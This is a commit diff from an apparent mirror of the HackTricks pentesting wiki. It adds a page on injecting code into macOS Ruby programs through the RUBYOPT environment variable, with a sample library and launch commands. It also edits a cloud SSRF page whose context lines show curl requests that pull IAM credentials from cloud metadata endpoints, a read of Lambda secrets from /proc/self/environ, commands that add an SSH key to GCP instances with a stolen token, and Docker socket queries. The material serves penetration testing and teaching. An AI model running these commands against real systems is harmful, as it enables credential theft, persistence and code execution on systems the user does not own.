Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4241: change request with no subject merged in GitBook

Browse source
This commit is contained in:
CPol 2024-01-22 12:24:45 +00:00 committed by gitbook-bot
parent f0447c9b2e
commit f00afc243f
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 85 additions and 16 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -179,6 +179,7 @@
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
* [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
* [macOS Ruby Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md)
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
* [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)

8
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
View file

@ -82,6 +82,14 @@ Check different options to make a Perl script execute arbitrary code in:
[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
{% endcontent-ref %}
### Ruby Injection
I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code:
{% content-ref url="macos-ruby-applications-injection.md" %}
[macos-ruby-applications-injection.md](macos-ruby-applications-injection.md)
{% endcontent-ref %}
### Python Injection
If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\

61
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md Normal file
View file

@ -0,0 +1,61 @@
# macOS Ruby Applications Injection
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## RUBYOPT
Using this env variable it's possible to **add new params** to **ruby** whenever it gets executed. Although the param **`-e`** cannot be used to specify ruby code to execute, it's possible to use the params **`-I`** and **`-r`** to add a new folder to the libraries to load path and then **specify a library to load**.
Create the library **`inject.rb`** in **`/tmp`**:
{% code title="inject.rb" %}
```ruby
puts `whoami`
```
{% endcode %}
Create anywahere a ruby script like:
{% code title="hello.rb" %}
```ruby
puts 'Hello, World!'
```
{% endcode %}
Then make an arbitrary ruby script load it with:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb
```
Fun fact, it works even with param **`--disable-rubyopt`**:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

31
pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
View file

@ -14,7 +14,7 @@ Other ways to support HackTricks:
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
@ -133,7 +133,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
{% endhint %}
### SSRF for AWS Lambda <a href="#6f97" id="6f97"></a>
### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
@ -149,7 +149,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat
Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
{% endhint %}
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
We retrieve the `accountId` and `region` from the API.
@ -168,13 +168,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
## GCP <a href="#6440" id="6440"></a>
## GCP <a href="#id-6440" id="id-6440"></a>
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a>
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:
* http://169.254.169.254
* http://metadata.google.internal
@ -284,7 +284,7 @@ gcloud config unset auth/access_token_file
```
{% endhint %}
### Add an SSH key <a href="#3e24" id="3e24"></a>
### Add an SSH key <a href="#id-3e24" id="id-3e24"></a>
Extract the token
@ -315,7 +315,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
```
{% endcode %}
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
{% hint style="warning" %}
There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
@ -335,7 +335,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
curl http://169.254.169.254/metadata/v1.json | jq
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
@ -477,7 +477,7 @@ At line:1 char:1
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
```
## IBM Cloud <a href="#2af0" id="2af0"></a>
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
{% hint style="warning" %}
Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
@ -509,11 +509,11 @@ curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instanc
```
{% endcode %}
## Packetcloud <a href="#2af0" id="2af0"></a>
## Packetcloud <a href="#id-2af0" id="id-2af0"></a>
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
## OpenStack/RackSpace <a href="#id-2ffc" id="id-2ffc"></a>
(header required? unknown)
@ -538,7 +538,7 @@ http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
## Alibaba <a href="#51bd" id="51bd"></a>
## Alibaba <a href="#id-51bd" id="id-51bd"></a>
```
http://100.100.100.200/latest/meta-data/
@ -564,19 +564,18 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
## Rancher <a href="#8cb7" id="8cb7"></a>
## Rancher <a href="#id-8cb7" id="id-8cb7"></a>
```
curl http://rancher-metadata/<version>/<path>
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>